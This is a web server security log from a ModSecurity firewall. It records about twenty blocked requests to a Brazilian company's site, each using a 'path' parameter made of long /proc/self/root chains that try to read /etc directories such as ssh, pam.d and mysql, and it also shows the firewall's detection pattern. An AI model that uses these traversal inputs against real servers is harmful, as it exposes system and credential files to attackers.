[Tue Mar 17 09:20:17.799393 2026] [:error] [pid 1210:tid 140411582465792] [client 74.7.241.46:48776] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablHAVKJy4A1bGlmj9BT_wAAAlM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:20:20.155740 2026] [:error] [pid 1926:tid 140411649607424] [client 74.7.241.46:54498] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablHBA1iGVhhz8eUyH7ihAAAAIs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:20:24.841533 2026] [:error] [pid 1210:tid 140411691570944] [client 74.7.241.46:54512] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablHCFKJy4A1bGlmj9BUCwAAAkY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:20:27.345852 2026] [:error] [pid 1731:tid 140411649607424] [client 74.7.241.46:54518] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablHCwb2qCuy5irgBMjIKQAAAEs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:20:28.711126 2026] [:error] [pid 7000:tid 140411632822016] [client 74.7.241.46:45146] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablHDBePVOt35XCGZP8uWwAAA40"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:20:29.978561 2026] [:error] [pid 2473:tid 140411741927168] [client 74.7.241.46:45154] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablHDaBJNF7axNlVR0X7cwAAAAA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:20:31.287019 2026] [:error] [pid 1731:tid 140411599251200] [client 74.7.241.46:45170] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablHDwb2qCuy5irgBMjILAAAAFE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:20:34.775159 2026] [:error] [pid 2305:tid 140411641214720] [client 74.7.241.46:45178] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablHEgQohV2v-7oj5HH6DQAAAYw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:20:36.115749 2026] [:error] [pid 2272:tid 140411666392832] [client 74.7.241.46:45190] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablHFOqR4k58SHWDy7tbowAAAgk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:20:37.330216 2026] [:error] [pid 1016:tid 140411548894976] [client 74.7.241.46:45198] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablHFZqmL8PQht4WJFlGhwAAAVc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:20:50.522835 2026] [:error] [pid 7000:tid 140411557287680] [client 74.7.241.46:35554] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablHIhePVOt35XCGZP8ubgAAA5Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:20:54.559675 2026] [:error] [pid 1961:tid 140411691570944] [client 74.7.243.203:49678] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablHJnRXaaWotPICgYskUQAAA0Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:21:14.242773 2026] [:error] [pid 2553:tid 140411548894976] [client 74.7.243.203:55372] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablHOv0Bec_B9OkZP_i75wAAAtc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:21:27.774754 2026] [:error] [pid 2473:tid 140411616036608] [client 74.7.243.203:52066] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablHR6BJNF7axNlVR0X7jQAAAA8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:21:32.909590 2026] [:error] [pid 11293:tid 140411599251200] [client 74.7.241.46:33880] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablHTNCmCSWTlPouqorKPAAAANE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:21:34.367523 2026] [:error] [pid 1961:tid 140411616036608] [client 74.7.241.46:33882] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablHTnRXaaWotPICgYskYgAAA08"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:21:35.465602 2026] [:error] [pid 1961:tid 140411616036608] [client 74.7.243.203:38552] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablHT3RXaaWotPICgYskYwAAA08"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:21:35.926546 2026] [:error] [pid 2305:tid 140411716749056] [client 74.7.241.46:33888] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablHTwQohV2v-7oj5HH6IQAAAYM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:21:40.543369 2026] [:error] [pid 11469:tid 140411632822016] [client 74.7.243.203:38568] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablHVJDEJR9VXonE_-1N3gAAAQ0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:21:44.272210 2026] [:error] [pid 2473:tid 140411699963648] [client 74.7.243.203:53014] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablHWKBJNF7axNlVR0X7kgAAAAU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:21:49.765113 2026] [:error] [pid 1210:tid 140411741927168] [client 74.7.243.203:53030] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablHXVKJy4A1bGlmj9BUJQAAAkA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
